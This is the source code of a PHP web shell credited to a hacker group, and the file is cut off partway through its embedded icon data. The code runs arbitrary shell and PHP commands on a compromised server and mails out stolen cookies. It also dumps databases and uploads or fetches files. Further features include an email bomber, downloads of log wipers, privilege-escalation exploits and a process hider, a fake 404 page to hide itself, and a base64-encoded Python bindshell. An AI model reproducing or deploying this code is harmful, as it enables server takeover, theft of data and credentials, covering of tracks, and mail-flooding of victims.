<?php /* ###################################################################### # [GHT]FiSh presents: # # by GHT # ############################DOCUMENTATION############################# #To execute commands, simply include ?cmd=___ in the url.

# #Ex: http://site.com/shl.php?cmd=whoami # # # #To steal cookies, use ?cookie=___ in the url. # #Ex: <script>document.location.href= # #'http://site.com/shl.php?cookie='+document.cookies</script> # # # #In the AJAX command shell, type 'home' to return to the shell's # #directory. Type 'clear' to clear the output screen. # ##########################VERIFICATION LEVELS######################### #0: No protection; anyone can access # #1: User-Agent required # #2: Require IP # #3: Basic Authentication # ##############################KNOWN BUGS############################## #The SQL tool is NOT complete. There is currently no editing function# #available. Some time in the future this may be fixed, but for now # #don't complain to me about it # ################################SHOUTS################################ #pr0be - Beta testing & CSS # #TrinTiTTY - Beta testing # #clorox - Beta testing # #Everyone else at g00ns.net # ########################NOTE TO ADMINISTRATORS######################## #If this script has been found on your server without your approval, # #it would probably be wise to delete it and check your logs. # ###################################################################### */ // Configuration $auth = 0; $uakey = "b5c3d0b28619de70bf5588505f4061f2"; // MD5 encoded user-agent $IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell $email = ""; // E-mail address where cookies will be sent $user = "GHT { Lito , Mr.Ps ,MR>Killer"; // MD5 encoded User $pass = "GHT"; // MD5 encoded Password // Global Variables $version = '2.0'; $self = $_SERVER['PHP_SELF']; $soft = $_SERVER['SERVER_SOFTWARE']; $servinf = split('[:]', $_SERVER['HTTP_HOST']); $servip = $servinf[0]; $servport = @$servinf[1] ? $servinf[1] : '80'; $cmd = @$_GET['cmd']; $act = @$_GET['act']; $cmd = @$_GET['cmd']; $curdir = cleandir(getcwd()); if(@$_GET['dir']){ $dir = $_GET['dir']; if($dir != 'nullz') $dir = cleandir($dir); } $contents = @$_POST['contents']; $gf = @$_POST['gf'];

$img = @$_GET['img']; // Credits to disruptiv for this bit ;) if(count(get_included_files()) > 1 count(get_included_files()) > 1) list($me) = explode("&", $_SERVER['REQUEST_URI']); else $me = $PHP_SELF . "?"; @session_start(); @set_time_limit(5); switch($auth){ // Authentication switcher case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey) hide(); break; case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)) hide(); break; case 3: if(!$_SERVER['PHP_AUTH_USER']) userauth(); break; default: break; } function cleandir($d){ // Function to clean up the $dir and $curdir variables $d = realpath($d); $d = str_replace("\\\\", "\\", $d); $d = str_replace("////", "//", $d); return($d); } function userauth(){ // Basic authentication function global $user, $pass; header("WWW-Authenticate: Basic realm='Secure Area'"); if(md5($_SERVER['PHP_AUTH_USER']) != $user md5($_SERVER['PHP_AUTH_PW'] != $pass)) hide(); } function get_exec_function(){ // Command execution method finder $exec_functions = array("popen", "exec", "shell_exec", "system", "passthru") ; $disabled_funcs = ini_get('disable_functions'); foreach($exec_functions as $f) if(strpos($disabled_funcs, $f) === false) ret urn $f; } function execute_command($exec_function, $command){ // Command execution functio n switch($exec_function){ case "popen": $h = popen($command, "r"); while(!feof($h)) echo(fgets($h) ); break; case "exec": exec($command, $result); foreach($result as $r) echo($r . " \n"); break; case "shell_exec": echo(shell_exec($command)); break; case "system": system($command); break; case "passthru": passthru($command); break; } } if(!$act && !$cmd && !@$_GET['cookie'] && !@$_GET['f'] && !@$dir && !$gf && !$im g && !@$_GET['ajxcmd']) main(); elseif(!$act && $cmd){ // Raw command execution style(); echo("<b>Results:</b>\n<br><textarea rows=20 cols=100>"); if($exec_function = get_exec_function()) execute_command($exec_function, $cm d); else die("All execution methods disabled.</textarea>"); echo("</textarea>"); }

elseif(@$_GET['ajxcmd']){ // Command execution for AJAX shell if($_GET['ajxcmd'] == "home") $_SESSION['work_dir'] = getcwd(); elseif($exec_function = get_exec_function()){ if(strpos($_GET['ajxcmd'], 'cd') === 0){ $c = array_pop(explode(" ", $_GET['ajxcmd'])); if(@is_dir($_SESSION['work_dir'] . DIRECTORY_SEPARATOR . $c) && $c[0 ] != '\\' && $c[0] != '//') $_SESSION['work_dir'] .= DIRECTORY_SEPARATOR . $c; elseif(@is_dir($c) && $c[0] != '.') $_SESSION['work_dir'] = $c; else echo("Invalid directory\n"); } else{ @chdir($_SESSION['work_dir']); execute_command($exec_function, $_GET['ajxcmd']); } } else die("All execution methods disabled."); } elseif(@$_GET['cookie']){@mail($email, "Cookie Data", @$_GET['cookie'], "From: $ email"); hide();} // Cookie stealer function elseif($act == 'view' && @$_GET['f'] && $dir) view($_GET['f'], $dir); elseif($img) img($img); elseif($gf) grab($gf); elseif(@$dir) files($dir); else{ switch($act){ case 'phpinfo': phpinfo();break; case 'sql': sql();break; case 'files': files(@$dir);break; case 'email': email();break; case 'cmd': cmd();break; case 'upload': upload();break; case 'tools': tools();break; case 'sqllogin': sqllogin();break; case 'sql': sql();break; case 'lookup': lookup();break; case 'kill': kill();break; case 'phpexec': execphp();break; case 'bshell': bshell();break; default: main();break; } } function hide(){ // Hiding function global $self, $soft, $servip, $servport; header("HTTP/1.0 404 Not Found"); ?> <!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'> <HTML><HEAD> <TITLE>404 Not Found</TITLE> </HEAD><BODY> <H1 align="center"><font size="3" face="Tahoma">GHT GAZA HACKER TEAM</font></H 1> <p align="center">All By Lito Mr.PS MR&gt;Killer</p> <H1>Not Found</H1> The requested URL <?php echo($self); ?> was not found on this server.<P> <P>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request . <HR> <ADDRESS><?php echo($soft . "Server at " . $servip . " Port " . $servport); ?></

ADDRESS> </BODY></HTML> <?php die(); } function style(){ // Style / header function global $servip,$version; ?> <html> <head> <title>All By GHT WWW.HACKER.PS shell v.<?php echo($version . "-" . $servip); ?> </title> <style> body { background-color:#000000; color:white; font-family:Verdana; font-size:11p x; } h1,h3 { color:white; font-family:Verdana; font-size:11px; } input,textarea,select,button { color:#FFFFFF; background-color:#000000; border:1 px solid #4F4F4F; font-family:Verdana; font-size:11px; } textarea { font-family:Courier; } a { color:#6F6F6F; text-decoration:none; font-family:Verdana; font-size:11px; } a:hover { color:#7F7F7F; } td { font-size:12px; vertical-align:middle; } th { font-size:13px; vertical-align:middle; } table { empty-cells:show; } .inf { color:#7F7F7F; } </style> </head> <?php } function main(){ // Main/menu function global $me, $self, $servip, $servport, $soft, $version; style(); $act = array('cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP i nfo', 'phpexec'=>'PHP Execute', 'tools'=>'Tools','sqllogin'=>'SQL','upload'=>'Get Files','kill'=>'Kill Shell '); $capt = array_flip($act); echo("<form method='GET' name='shell'>\n"); echo("<b>Host: <span class='inf'>$servip</span></b><br>\n"); echo("<b>Server software: <span class='inf'>$soft</span></b><br>\n"); echo("<b>Uname: <span class='inf'>" . php_uname() . "</span></b><br>\n"); echo("<b>Shell Directory: <span class='inf'>" . getcwd() . "</span></b><br>\ n"); echo("<div style='display:none' id='info'>\n"); echo("<b>Current User: <span class='inf'>" . @exec('whoami'). "</span></b><b r>\n"); echo("<b>ID: <span class='inf'>" . @exec('id') . "</span></b><br>\n"); echo("<b>Safemode: " . (@ini_get('safe_mode') ? "<font color='red'>ON</font> " : "<font color='green'>OFF</font><br>\n") . "</b>"); echo("<b>Open Base Dir: " . (@ini_get('open_basedir') != '' ? "[ <span class ='inf'>" . ini_get('open_basedir') . "</span> ]" : "<font color='green'>OFF</fon t>") . "</b><br>\n"); echo("<b>Disabled functions: <span class='inf'>" . (@ini_get('disable_functi ons') != '' ? @ini_get('disable_functions') : "None") . "</span></b><br>\n"); echo("<b>MySQL: " . (@function_exists(mysql_connect) ? "<font color='green'> ON</font>" : "<font color='red'>OFF</font>") . "</b>"); ?> </div>

<a href="#" onClick="document.getElementById('info').style.display = 'block';">M ore</a> <a href="#" onClick="document.getElementById('info').style.display = 'none';">Le ss</a> </html> <H1 align="center"><font size="3" face="Tahoma">GHT GAZA HACKER TEAM</font></H 1> <p align="center">All By Lito Mr.PS MR&gt;Killer</p> <p align="center"> <html> </p> <center> <h3 align='center'>Links</h3> <?php foreach($act as $link) echo("[ <a href='" . $me . "&act=" . $capt[$link] . " ' target='frm'>" . $link . "</a> ] "); ?> </center> <hr> <br><iframe name='frm' style='width:100%; height:65%; border:0;' src='<?php echo ($me . "&act=files"); ?>'></iframe> <pre style='text-align:center'>:: GHT WWW.HACKER.PS shell <font color='red'>v<?p hp echo($version); ?></font> ::</pre> <?php die(); } function cmd(){ // Command execution function global $me; style(); ?> <script> var http = null; function char(e){ if(window.event) k = e.keyCode; else if(e.which) k = e.which; if(k == 13){ cmd = document.getElementById('c').value; if(cmd == "clear") document.getElementById('history').value = ""; else if(document.getElementById('c').value != "") exec(cmd); document.getElementById('c').value = ""; } } function exec(cmd){ if (window.XMLHttpRequest) http = new XMLHttpRequest(); else if (window.ActiveXObject) http = new ActiveXObject("Microsoft.XMLHTTP") ; if(http){ http.onreadystatechange = handle_response; http.open("GET", "<?php echo($me . "&ajxcmd="); ?>" + cmd, true); http.send(null); } else alert("Your browser fails."); } function handle_response(){ if(http.readyState == 4) document.getElementById('history').value += "# " + cmd + "\n" + http.responseText; document.getElementById('history').scrollTop = document.getElementById('hist ory').scrollHeight; } </script> </head>

<body onLoad="document.getElementById('c').focus(); document.getElementById('his tory').scrollTop = document.getElementById('history').scrollHeight;"> <input type="text" id="c" onKeyDown="char(event);" style="width:100%; border:1px solid #1F1F1F;"><br><textarea id="history" style="width:100%; height:90%; borde r:0px; overflow: auto;"></textarea> </body></html> <?php } function execphp(){ // PHP code execution function style(); echo("<h4>Execute PHP Code</h4>"); echo("<form method='POST'>"); echo("<textarea name='phpexec' rows=5 cols=100>"); if(!@$_POST['phpexec']) echo("/*Don't include <? ?> tags*/\n"); echo(stripslashes(htmlentities(@$_POST['phpexec'])) . "</textarea>\n<br>\n") ; echo("<input type='submit' value='Execute'>"); echo("</form>"); if(@$_POST['phpexec']){ echo("<textarea rows=10 cols=100>"); eval(stripslashes($_POST['phpexec'])); echo("</textarea>"); } } function sqllogin(){ // MySQL login function global $me; if(@$_SESSION['isloggedin'] == "true") header("Location: " . $me . "&act=sql"); if(@$_POST['un'] && @$_POST['pw']) header("Location: " . $me . "&act=sql"); style(); ?> <form method='post'> User:<br><input type='text' name='un' size='30'><br> Password:<br><input type='text' name='pw' size='30'><br> Host:<br><input type='text' name='host' size='30' value='localhost'><br> Port:<br><input type='text' name='port' size='30' value='3306'><br> <input type='submit' value='Login'> </form> <?php die(); } function sql(){ // General SQL Function global $me; if(!@$_GET['sqlf']){style();} if(@$_POST['un'] && $_POST['pw']){; $_SESSION['sql_user'] = $_POST['un']; $_SESSION['sql_password'] = $_POST['pw']; } $_SESSION['sql_host'] = @$_POST['host'] ? $_POST['host'] : 'localhost'; $_SESSION['sql_port'] = @$_POST['port'] ? $_POST['port'] : '3306'; if(@$_SESSION['sql_user'] && @$_SESSION['sql_password']){ if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['s ql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))){ unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['s ql_host'], $_SESSION['sql_port']);

echo("Invalid credentials<br>\n"); die(sqllogin()); } else $_SESSION['isloggedin'] = "true"; } else die(sqllogin()); if (@$_GET['db']){ mysql_select_db($_GET['db'], $sqlcon); if(@$_GET['sqlquery']){ $dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error()) ; $num = mysql_num_rows($dat); for($i=0;$i<$num;$i++) echo(mysql_result($dat, $i) . "<br>\n"); } else if(@$_GET['table'] && !@$_GET['sqlf']){ echo("<a href='" . $me . "&act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&sqlf=ins" . "'>Insert Row</a><br><br>\n"); echo("<table border='1'>"); $query = "SHOW COLUMNS FROM " . $_GET['table']; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $i = 0; $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); echo("<th>" . $fields[$i]); $i++; } $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); $y=0; for($x=1;$x<=$num_rows+1;$x++){ if(!@$_GET['p']) $_GET['p'] = 1; if(@$_GET['p']){ if($y > (30*($_GET['p']-1)) && $y <= 30*($_GET['p'])){ echo("<tr>"); for($i=0;$i<count($fields);$i++){ $query = "SELECT " . $fields[$i] . " FROM " . $_GET[ 'table'] . " WHERE " . $fields[0] . " = '" . $x . "'"; $dat = mysql_query($query, $sqlcon) or die(mysql_err or()); while($row = mysql_fetch_row($dat)) echo("<td>" . $row[0] . "</td>"); } echo("</tr>\n"); } } $y++; } echo("</table>\n"); for($z=1;$z<=ceil($num_rows / 30);$z++){ echo("<a href='" . $me . "act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $z . "'>" . $z . "</a> "); } }

elseif(@$_GET['table'] && @$_GET['sqlf']){ switch($_GET['sqlf']){ case "dl": sqldownload();break; case "ins": sqlinsert();break; default: $_GET['sqlf'] = ""; } } else{ echo("<table>"); $query = "SHOW TABLES FROM " . $_GET['db']; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)) echo("<tr><td><a href='" . $me . "&act=sql&db=" . $_GET['db'] . "&table=" . $row[0] . "'>" . $row[0] . "</a></td><td>[<a href='" . $me . "&act=s ql&db=" . $_GET['db'] . "&table=" . $row[0] ."&sqlf=dl" . "'>Download</a>]</td>< /tr>\n"); echo("</table>"); } } else{ $dbs=mysql_list_dbs($sqlcon); while($row = mysql_fetch_object($dbs)) echo("<a href='" . $me . "&act=sql&db=" . $row->Database . "'>" . $r ow->Database . "</a><br>\n"); } mysql_close($sqlcon); } function sqldownload(){ // Download sql file function $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'] , $_SESSION['sql_user'], $_SESSION['sql_password']); mysql_select_db($_GET['db'], $sqlcon); $query = "SHOW COLUMNS FROM " . $_GET['table']; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); $i++; } $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mys ql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); for($x=1;$x<$num_rows;$x++){ $out .= "("; for($i=0;$i<count($fields);$i++){ $out .= "'"; $query = "SELECT " . $fields[$i] . " FROM " . $_GET['table'] . " WHE RE " . $fields[0] . " = '" . $x . "'"; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while($row = mysql_fetch_row($dat)){ if($row[0] == "") $row[0] = "NULL"; if($i != count($fields)-1) $out .= str_replace("\r\n", "\\r\\n", $row[0]) . "', "; else $out .= $row[0]. "'"; } } $out .= ");\n"; }

$filename = @$_GET['table'] . '-' . time() . '.sql'; header("Content-type: application/octet-stream"); header("Content-length: " . strlen($out)); header("Content-disposition: attachment; filename=$filename;"); echo($out); die(); } function sqlinsert(){ style(); $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'] , $_SESSION['sql_user'], $_SESSION['sql_password']); mysql_select_db($_GET['db'], $sqlcon); if(@$_POST['ins']){ unset($_POST['ins']); $fields = array_flip($_POST); print_r($_POST); $f = implode(",", $fields); $v = implode("','", $_POST); $query = "INSERT INTO " . $_GET['table'] . " (" . $f . ") VALUES ('" . $ v . "')"; echo($query); mysql_query($query, $sqlcon) or die("MYSQL ERROR: " . mysql_error()); die("Row inserted.<br>\n<a href='" . $me . "&act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "'>Go back</a>"); } $query = "SHOW COLUMNS FROM " . @$_GET['table']; $result = mysql_query($query, $sqlcon) or die("MYSQL ERROR: " . mysql_error( )); $i = 0; $fields = array(); echo("<form method='POST'>"); echo("<table>"); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); echo("<tr><td><b>" . $fields[$i] . "</b><td><input type='text' name='" . $fields[$i] . "'><br>\n"); $i++; } echo("</table>"); echo("<br>\n<input type='submit' value='Insert' name='ins'>"); echo("</form>"); } function nicesize($size){ if(!$size) return "0 B"; if ($size >= 1073741824) return(round($size / 1073741824) . " GB"); elseif ($size >= 1048576) return(round($size / 1048576) . " MB"); elseif ($size >= 1024) return(round($size / 1024) . " KB"); else return($size . " B"); } function files($dir){ // File manipulator function global $me, $self, $curdir; style(); if($dir=="") $dir = $curdir; $dirx = explode(DIRECTORY_SEPARATOR, $dir); $files = array(); $folders = array(); echo("<form method='GET'>");

echo("<input type='text' name='dir' value='$dir' size='40'>"); echo("<input type='submit' value='Go'>"); echo("</form>"); echo("<h4>File list for "); for($i=0;$i<count($dirx);$i++){ @$totalpath .= $dirx[$i] . DIRECTORY_SEPARATOR; echo("<a href='" . $me . "&dir=$totalpath" . "'>$dirx[$i]</a>" . DIRECTO RY_SEPARATOR); } echo("</h4>"); echo("<table>"); echo("<th>File Name<th>File Size</th>"); if ($handle = opendir($dir)) { while (false != ($link = readdir($handle))) { if (@is_dir($dir . DIRECTORY_SEPARATOR . $link)){ $file = array(); $color = @is_writable($dir . DIRECTORY_SEPARATOR . $link) ? "for estgreen" : (is_readable($dir . DIRECTORY_SEPARATOR . $link) ? "gold" : "red"); @$file['link'] = "<a href='$me&dir=$dir" . DIRECTORY_SEPARATOR . "$link'><font color='$color'>$link</font></a>"; @$file['icon'] = "folder"; $folder = "<img src='" . $me . "&img=" . $file['icon'] . "'>&nbs p;". $file['link']; array_push($folders, $folder); } else{ $file = array(); $ext = strpos($link, ".") ? strtolower(end(explode(".", $link))) : ""; $file['size'] = nicesize(@filesize($dir . DIRECTORY_SEPARATOR . $link)); $color = @is_writable($dir . DIRECTORY_SEPARATOR . $link) ? "for estgreen" : (is_readable($dir . DIRECTORY_SEPARATOR . $link) ? "gold" : "red"); @$file['link'] = "<a href='$me&act=view&f=$link&dir=$dir'><font color='$color'>$link</font></a>"; switch($ext){ case 'exe': case 'com': case 'jar': case '': $file['icon']=' binary'; break; case 'jpg': case 'gif': case 'png': case 'bmp': $file['icon' ]='image'; break; case 'zip': case 'tar': case 'rar': case 'gz': case 'cab': c ase 'bz2': case 'gzip': $file['icon']='compressed'; break; case 'txt': case 'doc': case 'pdf': case 'htm': case 'html': case 'rtf': $file['icon']='text'; break; case 'wav': case 'mp3': case 'mp4': case 'wma': $file['icon' ]='sound'; break; case 'js': case 'vbs': case 'c': case 'h': case 'sh': case ' pl': case 'py': case 'php': case 'h': $file['icon']='script'; break; default: $file['icon'] = 'unknown'; break; } $file = "<tr><td><img src='" . $me . "&img=" . $file['icon'] . " ' height='18' width='18'>&nbsp;". $file['link'] . "<td>" . $file['size'] . "</td ></tr>\n"; array_push($files, $file); } } foreach($folders as $folder) echo("<tr><td>$folder</td><td>DIR</td></tr> \n"); foreach($files as $file) echo($file); echo("</table>");

closedir($handle); } } function email(){ // Email bomber function global $me; style(); ?> <form method='POST' action='<?php echo("$me&act=email"); ?>'> <b>Your address:</b><br> <input name='from' type='text' size='35'><br> <b>Their address:</b><br> <input name='to' type='text' size='35'><br> <b>Subject:</b><br> <input name='subject' type='text' size='35'><br> <b>Text:</b><br> <input name='body' type='text' size='35'><br> <b>How many times:</b><br> <input name='times' type='text' size='5'><br><br> <input name='submit' type='submit' value='Submit'> </form> <?php if (@$_POST['to'] && @$_POST['from']){ $headers = "From: " . $_POST['from']; for($i=0; $i<@$_POST['times']; $i++){ @mail(@$_POST['to'], @$_POST['subject'], @$_POST['body'], $headers) or die("Mail could not be sent"); } echo("Mail sent"); } } function view($filename, $dir){ // File view function global $me; if(@$_POST['fileact'] == "Download"){ header("Content-type: application/octet-stream"); header("Content-length: " . strlen($_POST['contents'])); header("Content-disposition: attachment; filename=" . basename($filename ) . ";"); $handle = @fopen($filename, "r"); echo(@fread($handle, filesize($filename))); die(); } style(); if(@$_POST['contents'] && @$_POST['fileact'] == "Save"){ $handle = @fopen($filename, 'w'); fwrite($handle, stripslashes($_POST['contents'])); fclose($handle); echo("Saved file.<br><br>"); echo("<a href='$me&act=view&f=$filename&dir=nullz'>Go back</a>"); die(); } elseif(@$_POST['fileact'] == "Delete"){ unlink($filename); echo("Deleted file.<br><br>"); echo("<a href='$me&act=files'>Go back</a>"); die(); } if($dir != "nullz") $filename = $dir . DIRECTORY_SEPARATOR . $filename; // h

eh $file = @fopen($filename, 'r'); $content = @fread($file, @filesize($filename)); echo("<form name='file' method='POST' action='$me&act=view&dir=$dir&f=$filen ame'>"); echo("<textarea style='width:100%; height:92%;' name='contents'>"); echo(htmlentities($content) . "\n"); ?> </textarea> <input name='fileact' type='submit' value='Save'> <input name='fileact' type='submit' value='Delete'> <input name='fileact' type='submit' value='Download'> </form> <?php } function upload(){ // Uploading frontend function global $curdir; style(); ?> <form name='files' enctype='multipart/form-data' method='POST'> <b>Output Directory</b><br> <input type='text' name='loc' size='65' value='<?php echo($curdir); ?>'><br><br> <b>Remote Upload</b><br> <input type='text' name='rem' size='65'> <input type='submit' value='Grab'><br><br> <b>Local File Upload</b><br> <input name='up' type='file' size='65'> <input type='submit' value='Upload'> </form><br> <?php if(@$_POST['rem']) grab($_POST['rem']); if(@$_FILES['up']) up($_FILES['up']); } function up($up){ // Uploading backend funciton style(); $updir = @$_POST['loc']; move_uploaded_file($up['tmp_name'], $updir . DIRECTORY_SEPARATOR . $up['name ']); die("File has been uploaded."); } function grab($file){ // Uploading backend function style(); $updir = @$_POST['loc']; $filex = array_pop(explode(DIRECTORY_SEPARATOR, $file)); if(exec("wget $file -b -O $updir" . DIRECTORY_SEPARATOR . $filex)) die("File has been uploaded."); else die("File upload failed."); } function tools(){ // Useful tools function global $me, $curdir; style(); $tools = array( "--- Log wipers ---"=>"1", "Vanish2.tgz"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/v anish2.tgz", "Cloak.c"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/cloak

.c", "gh0st.sh"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/gh0s t.sh", "--- Priv Escalation ---"=>"2", "h00lyshit - Linux 2.6 ALL"=>"http://someshit.net/files/xpl/h00lyshit", "k-rad3 - Linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3", "raptor - Linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor", "rootbsd - BSD v?"=>"http://someshit.net/files/xpl/rootbsd", "--- Bindshells ---"=>"3", "THC rwwwshell-1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshe ll-1.6.perl", "Basic Perl bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bind shell-unix", "--- Misc ---"=>"4", "MOCKS SOCKS4 Proxy"=>"http://superb-east.dl.sourceforge.net/sourceforge/moc ks/mocks-0.0.2.tar.gz", "xps.c (proc hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/u nix-tools/xps.c"); $names = array_flip($tools); echo("<form method='post'>"); echo("<b>Output Directory</b><br>"); echo("<input type='text' name='loc' size='65' value='$curdir'><br><br>"); echo("<select name='gf' style='align:center;'>"); foreach($tools as $tool) echo(is_numeric($tool) ? "<optgroup label='$names[$tool]'>\n" : "<optio n value='$tool'>$names[$tool]</option>\n"); echo("</select>"); echo("<br><input type='submit' value='Grab'>"); echo("</form>"); echo("<br>"); echo("<a href=$me&act=bshell>Bindshell</a> (requires writable directory)<br> \n"); echo("<a href=$me&act=lookup>List domains</a> (requires writable directory)< br>\n"); echo("<a href=$me&act=email>E-mail bomber</a><br>\n"); } function lookup(){ // Domain lookup function global $servinf; style(); $script = "import urllib, urllib2, sys, re req = urllib2.Request('http://www.seologs.com/ip-domains.html', urllib.urlen code({'domainname' : sys.argv[1]})) site = re.findall('.+\) (.+)<br>', urllib2.urlopen(req).read()) for i in xrange(0,len(site)): print site[i]"; // My sexy python script $handle = fopen('lookup.py', 'w'); @fwrite($handle, $script); @fclose($handle); echo("<h4>Domains</h4>"); echo("<ul>"); $cmd = exec("python lookup.py $servinf[0]", $ret); foreach($ret as $site) echo("<li>$site\n"); echo("</ul>"); @unlink('lookup.py'); } function bshell(){ // Python bindshell script style(); if(!@$_POST['bport']){ ?> <form method = POST>

<b>Port: </b> <input type = 'text' name = 'bport' value = '5001'> <input type = 'submit' value = 'Bind'> </form> <?php die(); } $script = "IyEvdXNyL2Jpbi9lbnYvcHl0aG9uDQppbXBvcnQgc3lzLHNvY2tldCxvcw0KZGVmI GJpbmRtZShwb3J0KToNCiAgcy A9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NUUkVBTSkNCiAgdH J5Og0KICAgIHMuYmluZCgoJyc saW50KHBvcnQpKSkNCiAgICBzLmxpc3Rlbig1KQ0KICBleGNlcHQ6DQogICAgc3lzLmV4aXQoJ0N hbm5vdCBjcmVhdGUgc29ja2V0 JykNCiAgdW4gPSBvcy5lbnZpcm9uWyJMT0dOQU1FIl0NCiAgaWYgdW4gPT0gJ3Jvb3QnOiBwcm9t cHQ9JyAjICcNCiAgZWxzZTogc HJvbXB0PScgJCAnDQogIHdoaWxlIFRydWU6DQogICAgYywgZGV0YWlscyA9IHMuYWNjZXB0KCkNC iAgICBjLnNlbmQoIldlbGNvbW UgdG8gdGhlIHNlcnZlciA7KVxuU2hlbGwga2lsbCBjb21tYW5kIGlzICdkaWUnLlxuIikNCiAgIC B3aGlsZSBUcnVlOg0KICAgICA gdHJ5Og0KICAgICAgICBjLnNlbmQodW4gKyAnQCcgKyBzb2NrZXQuZ2V0aG9zdG5hbWUoKSArICc gJyArIG9zLmdldGN3ZCgpICsg cHJvbXB0KQ0KICAgICAgICBkYXQgPSBjLnJlY3YoNDA5NikucnN0cmlwKCkNCiAgICAgICAgaWYg ZGF0WzA6Ml0gPT0gJ2NkJzoNC iAgICAgICAgICBvcy5jaGRpcihkYXRbMzpdKQ0KICAgICAgICBpZiBkYXRbMDozXSA9PSAnZGllJ zoNCiAgICAgICAgICBvcy5wb3 Blbigna2lsbCAnICsgc3RyKG9zLmdldHBpZCgpKSkNCiAgICAgICAgYy5zZW5kKG9zLnBvcGVuKG RhdCkucmVhZCgpLnJzdHJpcCg pICsgJ1xuJykNCiAgICAgIGV4Y2VwdCBzb2NrZXQuZXJyb3I6DQogICAgICAgIHMuY2xvc2UoKQ0 KICAgICAgICBiaW5kbWUocG9y dCkNCiAgICBjLmNsb3NlKCkNCmlmIG9zLmZvcmsoKToNCiAgc3lzLmV4aXQoMCkNCmJpbmRtZShp bnQoc3lzLmFyZ3ZbMV0pKQ=="; $handle = fopen('b.py', 'w'); @fwrite($handle, base64_decode($script)); @fclose($handle); exec("python b.py " + $_POST['bport']); @unlink("b.py"); } function img($img){ // Images function $images = array( "folder"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAA AAAAAAAAAAAAAAAACH5BAEAAA" . "gALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4 YRYPB2DOlHPiKwq" . "d1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", "image"=>"R0lGODlhFAAWAOMAAP////8zM8z//8zMzJmZmWZmZmYAADMzMwCZzACZMwAzZgAAAA AAAAAAAAAAAAAAACH+TlRoaX" . "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY 29tLCBTZXB0ZW1i" . "ZXIgMTk5NQAh+QQBAAACACwAAAAAFAAWAAAEkPDISae4WBzAu99Hdm1eSYYZWXYqOgJBLAcDoNr YNssGsBy/4GsX6y" . "2OyMWQ2OMQngSlBjZLWBM1AFSqkyU4A2tWywUMYt/wlTSIvgYGA/Zq3QwU7mmHvh4g8GUsfAUHC H95NwMHV4SGh4Ed" . "ihOOjy8rZpSVeiV+mYCWHncKo6Sfm5cliAdQrK1PQBlJsrNSEQA7", "unknown"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0 IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBA AABACwAAAAAFAAW" . "AAADaDi6vPEwDECrnSO+aTvPEQcIAmGaIrhR5XmKgMq1LkoMN7ECrjDWp52r0iPpJJ0KjUAq7Sx LE+sI+9V8vycFiM" .

